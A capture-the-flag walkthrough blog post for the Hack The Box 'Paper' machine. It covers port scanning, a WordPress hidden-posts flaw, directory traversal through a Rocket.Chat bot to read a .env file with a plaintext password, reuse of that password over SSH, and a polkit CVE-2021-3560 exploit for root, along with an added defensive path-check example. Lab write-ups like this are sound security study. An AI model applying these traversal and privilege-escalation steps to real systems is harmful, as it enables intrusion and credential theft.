HTB-Paper

metafa1ica
# /etc/hosts entry
10.129.63.64    office.paper

ip='10.129.63.64'
# Collect every open TCP port, then run default scripts and version detection on just those ports
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV $ip


Version: WordPress 5.2.3


CVE-2019-17671

Unauthenticated access to hidden posts

/?static=1
/?static=1&order=asc # this one returns 404


A registration link shows up: http://chat.office.paper/register/8qozr226AhkCHZdyY

https://github.com/RocketChat/hubot-rocketchat


When registering, the nickname admin is reported as already taken.

Does this bot allow command injection?


Found the path.


recyclops file sale/portfolio.txt
<!=====Contents of file sale/portfolio.txt=====>
Portfolio
----------
- Bill
- Served the country in war
- Family built the country
- purchased paper worth a million dollars
- will probably fire me.
<!=====End of file sale/portfolio.txt=====>

Plain directory traversal works.


The earlier failure on etc was a genuine lack of permission to read it.
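An added example, not part of the original write-up and not the bot's own code, showing the check that would have stopped the traversal above: the bot must resolve the requested name under its serving directory and refuse anything that lands outside it. The base directory /home/dwight/sales is assumed.

```python
"""Confining a bot "file <name>" command to one directory (added example)."""
import posixpath
from typing import Optional

# Directory the bot is allowed to serve from (assumed for this example; the
# write-up only shows that a "sales" directory exists under /home/dwight).
SALES_DIR = "/home/dwight/sales"


def resolve_inside(base_dir: str, requested: str) -> Optional[str]:
    """Return the normalised absolute path if ``requested`` stays inside
    ``base_dir``, otherwise ``None``.

    The check is purely lexical (no filesystem access) so it runs offline;
    a production handler should additionally call ``os.path.realpath`` on the
    result so a symlink inside the directory cannot point back outside it.
    """
    if not requested or "\0" in requested:
        return None                      # empty name or NUL byte: reject
    if posixpath.isabs(requested):
        return None                      # only relative names are accepted
    base = posixpath.normpath(base_dir)
    # normpath collapses "." and ".." segments, so "../../x" is resolved
    # before the containment check rather than matched as a substring.
    target = posixpath.normpath(posixpath.join(base, requested))
    # Must be the base itself or a descendant. Comparing with a trailing
    # separator stops "/home/dwight/sales2" passing as a child of ".../sales".
    if target != base and not target.startswith(base + "/"):
        return None
    return target


def handle_file_command(arg: str) -> dict:
    """Hypothetical stand-in for the bot's ``file`` handler: reports what it
    would do with the argument instead of opening any file."""
    resolved = resolve_inside(SALES_DIR, arg)
    if resolved is None:
        return {"ok": False, "error": "path escapes the sales directory"}
    return {"ok": True, "path": resolved}
```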

recyclops list ../
Fetching the directory listing of ../
total 32
drwx------ 11 dwight dwight 281 Feb 6 2022 .
drwxr-xr-x. 3 root root 20 Jan 14 2022 ..
lrwxrwxrwx 1 dwight dwight 9 Jul 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 dwight dwight 18 May 10 2019 .bash_logout
-rw-r--r-- 1 dwight dwight 141 May 10 2019 .bash_profile
-rw-r--r-- 1 dwight dwight 358 Jul 3 2021 .bashrc
-rwxr-xr-x 1 dwight dwight 1174 Sep 16 2021 bot_restart.sh
drwx------ 5 dwight dwight 56 Jul 3 2021 .config
-rw------- 1 dwight dwight 16 Jul 3 2021 .esd_auth
drwx------ 2 dwight dwight 44 Jul 3 2021 .gnupg
drwx------ 8 dwight dwight 4096 Sep 16 2021 hubot
-rw-rw-r-- 1 dwight dwight 18 Sep 16 2021 .hubot_history
drwx------ 3 dwight dwight 19 Jul 3 2021 .local
drwxr-xr-x 4 dwight dwight 39 Jul 3 2021 .mozilla
drwxrwxr-x 5 dwight dwight 83 Jul 3 2021 .npm
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 sales
drwx------ 2 dwight dwight 6 Sep 16 2021 .ssh
-r-------- 1 dwight dwight 33 Jul 30 11:04 user.txt
drwxr-xr-x 2 dwight dwight 24 Sep 16 2021 .vim


<!=====Contents of file ../bot_restart.sh=====>
#!/bin/bash

# Cleaning hubot's log so that it won't grow too large.
echo "" > /home/dwight/hubot/.hubot.log

# For starting the bot 20-ish (10+20) seconds late, when the server is restarted.
# This is because MongoDB and Rocket-Chat server needs some time to startup properly
sleep 10s

# Checks if Hubot is running every 10s
while [ 1 ];
do
sleep 20s
alive=$(/usr/sbin/ss -tulnp|grep 8000);
if [[ -n $alive ]]; then
err=$(grep -i 'unhandled-rejections=strict' /home/dwight/hubot/.hubot.log)
if [[ -n $err ]]; then
# Restarts bot
echo "[-] Bot not running! date";
#Killing the old process
pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
kill -9 $pid;
cd /home/dwight/hubot;
# Cleaning hubot's log so that it won't grow too large.
echo "" > /home/dwight/hubot/.hubot.log
bash /home/dwight/hubot/start_bot.sh&
else

echo "[+] Bot running succesfully! date";
fi

else
# Restarts bot
echo "[-] Bot not running! date";
#Killing the old process
pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
kill -9 $pid;
cd /home/dwight/hubot;
bash /home/dwight/hubot/start_bot.sh&
fi

done
<!=====End of file ../bot_restart.sh=====>
/home/dwight/hubot/start_bot.sh
<!=====Contents of file ../../../../../home/dwight/hubot/start_bot.sh=====>
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
<!=====End of file ../../../../../home/dwight/hubot/start_bot.sh=====>

/home/dwight/hubot/.env contains credentials

<!=====Contents of file ../../../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

But they are not allowed to log in to the web UI.

But /etc/passwd is readable.

There are two users:

rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash

Use the password directly for SSH; the user was already hinted to be dwight earlier.

ssh dwight@10.129.63.64


Privilege escalation via pkexec

The polkit version is polkit-0.115-6.el8.x86_64, which is < 0.119 and therefore affected by the pkexec privilege escalation.


https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

./1.sh -p=pass123

If it fails, try a few more times. At first, setting the password to admin did not work, and the default password did not succeed either. After one success, any password works.

658a7b1b362501069febe4405316cc99

  • Title: HTB-Paper
  • Author: metafa1ica
  • Created: 2025-07-30 23:03:39
  • Updated: 2025-08-17 13:29:28
  • Link: https://metafa1ica.github.io/post/b505816a5383/
  • License: This article is licensed under CC BY-NC-SA 4.0.